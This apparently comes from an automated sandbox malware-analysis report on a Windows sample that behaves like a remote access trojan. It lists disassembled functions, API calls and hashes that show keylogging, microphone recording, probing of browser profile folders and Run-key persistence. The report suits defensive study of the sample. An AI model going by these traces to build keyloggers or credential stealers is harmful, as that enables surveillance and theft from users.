                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: alarm.wav$hYG
                                                              • API String ID: 1174141254-2782910960
                                                              • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                              • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                              • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                                              • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                              Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                              • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                              • String ID: Online Keylogger Stopped
                                                              • API String ID: 1623830855-1496645233
                                                              • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                              • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                              • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                                              • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                              Function 00448C33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx$PkGNG
                                                              • API String ID: 2568140703-1065776982
                                                              • Opcode ID: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                                              • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                              • Opcode Fuzzy Hash: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                                              • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                              Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wave$BufferHeaderPrepare
                                                              • String ID: XMG
                                                              • API String ID: 2315374483-813777761
                                                              • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                              • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                              • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                              • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                              Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocaleValid
                                                              • String ID: IsValidLocaleName$kKD
                                                              • API String ID: 1901932003-3269126172
                                                              • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                                              • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                              • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                                              • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                              Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                              • API String ID: 1174141254-4188645398
                                                              • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                              • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                              • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                                              • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                              Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                              • API String ID: 1174141254-2800177040
                                                              • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                              • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                              • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                                              • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                              Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: AppData$\Opera Software\Opera Stable\
                                                              • API String ID: 1174141254-1629609700
                                                              • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                              • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                              • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                                              • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                              Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyState.USER32(00000011), ref: 0040B686
                                                                • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                              • String ID: [AltL]$[AltR]
                                                              • API String ID: 2738857842-2658077756
                                                              • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                              • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                              • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                                              • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                              Function 004489D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Time$FileSystem
                                                              • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                              • API String ID: 2086374402-949981407
                                                              • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                              • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                              • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                                              • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                              Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID: !D@$open
                                                              • API String ID: 587946157-1586967515
                                                              • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                              • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                              • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                                              • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                              Function 004555CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___initconout.LIBCMT ref: 004555DB
                                                                • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                                              • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ConsoleCreateFileWrite___initconout
                                                              • String ID: PkGNG
                                                              • API String ID: 3087715906-263838557
                                                              • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                              • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                                              • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                              • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                                              Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: State
                                                              • String ID: [CtrlL]$[CtrlR]
                                                              • API String ID: 1649606143-2446555240
                                                              • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                              • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                              • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                                              • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                              Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Init_thread_footer__onexit
                                                              • String ID: ,kG$0kG
                                                              • API String ID: 1881088180-2015055088
                                                              • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                              • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                              • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                              • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                              Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                                              • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteOpenValue
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                              • API String ID: 2654517830-1051519024
                                                              • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                              • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                              • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                              • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                              Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                              • GetLastError.KERNEL32 ref: 00440D85
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0
                                                              • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                              • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                              • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                              • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                              Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                              • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastRead
                                                              • String ID:
                                                              • API String ID: 4100373531-0
                                                              • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                              • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                              • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                              • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                              Execution Graph

                                                              Execution Coverage:6.2%
                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:77
                                                              execution_graph 40323 441819 40326 430737 40323->40326 40325 441825 40327 430756 40326->40327 40339 43076d 40326->40339 40328 430774 40327->40328 40329 43075f 40327->40329 40341 43034a memcpy 40328->40341 40340 4169a7 11 API calls 40329->40340 40332 4307ce 40333 430819 memset 40332->40333 40342 415b2c 11 API calls 40332->40342 40333->40339 40334 43077e 40334->40332 40337 4307fa 40334->40337 40334->40339 40336 4307e9 40336->40333 40336->40339 40343 4169a7 11 API calls 40337->40343 40339->40325 40340->40339 40341->40334 40342->40336 40343->40339 37671 442ec6 19 API calls 37848 4152c6 malloc 37849 4152e2 37848->37849 37850 4152ef 37848->37850 37852 416760 11 API calls 37850->37852 37852->37849 37853 4466f4 37872 446904 37853->37872 37855 446700 GetModuleHandleA 37858 446710 __set_app_type __p__fmode __p__commode 37855->37858 37857 4467a4 37859 4467ac __setusermatherr 37857->37859 37860 4467b8 37857->37860 37858->37857 37859->37860 37873 4468f0 _controlfp 37860->37873 37862 4467bd _initterm __wgetmainargs _initterm 37864 44681e GetStartupInfoW 37862->37864 37865 446810 37862->37865 37866 446866 GetModuleHandleA 37864->37866 37874 41276d 37866->37874 37870 446896 exit 37871 44689d _cexit 37870->37871 37871->37865 37872->37855 37873->37862 37875 41277d 37874->37875 37917 4044a4 LoadLibraryW 37875->37917 37877 412785 37908 412789 37877->37908 37925 414b81 37877->37925 37880 4127c8 37931 412465 memset ??2@YAPAXI 37880->37931 37882 4127ea 37943 40ac21 37882->37943 37887 412813 37961 40dd07 memset 37887->37961 37888 412827 37966 40db69 memset 37888->37966 37892 412822 37987 4125b6 ??3@YAXPAX 37892->37987 37893 40ada2 _wcsicmp 37894 41283d 37893->37894 37894->37892 37897 412863 CoInitialize 37894->37897 37971 41268e 37894->37971 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37897->37991 37901 41296f 37993 40b633 37901->37993 37903 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37909 412957 CoUninitialize 37903->37909 37914 4128ca 37903->37914 37908->37870 37908->37871 37909->37892 37910 4128d0 TranslateAcceleratorW 37911 412941 GetMessageW 37910->37911 37910->37914 37911->37909 37911->37910 37912 412909 IsDialogMessageW 37912->37911 37912->37914 37913 4128fd IsDialogMessageW 37913->37911 37913->37912 37914->37910 37914->37912 37914->37913 37915 41292b TranslateMessage DispatchMessageW 37914->37915 37916 41291f IsDialogMessageW 37914->37916 37915->37911 37916->37911 37916->37915 37918 4044cf GetProcAddress 37917->37918 37921 4044f7 37917->37921 37919 4044e8 FreeLibrary 37918->37919 37922 4044df 37918->37922 37920 4044f3 37919->37920 37919->37921 37920->37921 37923 404507 MessageBoxW 37921->37923 37924 40451e 37921->37924 37922->37919 37923->37877 37924->37877 37926 414b8a 37925->37926 37927 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37925->37927 37997 40a804 memset 37926->37997 37927->37880 37930 414b9e GetProcAddress 37930->37927 37932 4124e0 37931->37932 37933 412505 ??2@YAPAXI 37932->37933 37934 41251c 37933->37934 37936 412521 37933->37936 38019 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37934->38019 38008 444722 37936->38008 37942 41259b wcscpy 37942->37882 38024 40b1ab free free 37943->38024 37947 40a9ce malloc memcpy free free 37954 40ac5c 37947->37954 37948 40ad4b 37956 40ad76 37948->37956 38048 40a9ce 37948->38048 37950 40ace7 free 37950->37954 37954->37947 37954->37948 37954->37950 37954->37956 38028 40a8d0 37954->38028 38040 4099f4 37954->38040 37955 40a8d0 7 API calls 37955->37956 38025 40aa04 37956->38025 37957 40ada2 37958 40adc9 37957->37958 37959 40adaa 37957->37959 37958->37887 37958->37888 37959->37958 37960 40adb3 _wcsicmp 37959->37960 37960->37958 37960->37959 38053 40dce0 37961->38053 37963 40dd3a GetModuleHandleW 38058 40dba7 37963->38058 37967 40dce0 3 API calls 37966->37967 37968 40db99 37967->37968 38130 40dae1 37968->38130 38144 402f3a 37971->38144 37973 412766 37973->37892 37973->37897 37974 4126d3 _wcsicmp 37975 4126a8 37974->37975 37975->37973 37975->37974 37977 41270a 37975->37977 38178 4125f8 7 API calls 37975->38178 37977->37973 38147 411ac5 37977->38147 37988 4125da 37987->37988 37989 4125f0 37988->37989 37990 4125e6 DeleteObject 37988->37990 37992 40b1ab free free 37989->37992 37990->37989 37991->37903 37992->37901 37994 40b640 37993->37994 37995 40b639 free 37993->37995 37996 40b1ab free free 37994->37996 37995->37994 37996->37908 37998 40a83b GetSystemDirectoryW 37997->37998 37999 40a84c wcscpy 37997->37999 37998->37999 38004 409719 wcslen 37999->38004 38002 40a881 LoadLibraryW 38003 40a886 38002->38003 38003->37927 38003->37930 38005 409724 38004->38005 38006 409739 wcscat LoadLibraryW 38004->38006 38005->38006 38007 40972c wcscat 38005->38007 38006->38002 38006->38003 38007->38006 38009 444732 38008->38009 38010 444728 DeleteObject 38008->38010 38020 409cc3 38009->38020 38010->38009 38012 412551 38013 4010f9 38012->38013 38014 401130 38013->38014 38015 401134 GetModuleHandleW LoadIconW 38014->38015 38016 401107 wcsncat 38014->38016 38017 40a7be 38015->38017 38016->38014 38018 40a7d2 38017->38018 38018->37942 38018->38018 38019->37936 38023 409bfd memset wcscpy 38020->38023 38022 409cdb CreateFontIndirectW 38022->38012 38023->38022 38024->37954 38026 40aa14 38025->38026 38027 40aa0a free 38025->38027 38026->37957 38027->38026 38029 40a8eb 38028->38029 38030 40a8df wcslen 38028->38030 38031 40a906 free 38029->38031 38032 40a90f 38029->38032 38030->38029 38033 40a919 38031->38033 38034 4099f4 3 API calls 38032->38034 38035 40a932 38033->38035 38036 40a929 free 38033->38036 38034->38033 38038 4099f4 3 API calls 38035->38038 38037 40a93e memcpy 38036->38037 38037->37954 38039 40a93d 38038->38039 38039->38037 38041 409a41 38040->38041 38042 4099fb malloc 38040->38042 38041->37954 38044 409a37 38042->38044 38045 409a1c 38042->38045 38044->37954 38046 409a30 free 38045->38046 38047 409a20 memcpy 38045->38047 38046->38044 38047->38046 38049 40a9e7 38048->38049 38050 40a9dc free 38048->38050 38052 4099f4 3 API calls 38049->38052 38051 40a9f2 38050->38051 38051->37955 38052->38051 38077 409bca GetModuleFileNameW 38053->38077 38055 40dce6 wcsrchr 38056 40dcf5 38055->38056 38057 40dcf9 wcscat 38055->38057 38056->38057 38057->37963 38078 44db70 38058->38078 38062 40dbfd 38081 4447d9 38062->38081 38065 40dc34 wcscpy wcscpy 38107 40d6f5 38065->38107 38066 40dc1f wcscpy 38066->38065 38069 40d6f5 3 API calls 38070 40dc73 38069->38070 38071 40d6f5 3 API calls 38070->38071 38072 40dc89 38071->38072 38073 40d6f5 3 API calls 38072->38073 38074 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38073->38074 38113 40da80 38074->38113 38077->38055 38079 40dbb4 memset memset 38078->38079 38080 409bca GetModuleFileNameW 38079->38080 38080->38062 38083 4447f4 38081->38083 38082 40dc1b 38082->38065 38082->38066 38083->38082 38084 444807 ??2@YAPAXI 38083->38084 38085 44481f 38084->38085 38086 444873 _snwprintf 38085->38086 38087 4448ab wcscpy 38085->38087 38120 44474a 8 API calls 38086->38120 38089 4448bb 38087->38089 38121 44474a 8 API calls 38089->38121 38090 4448a7 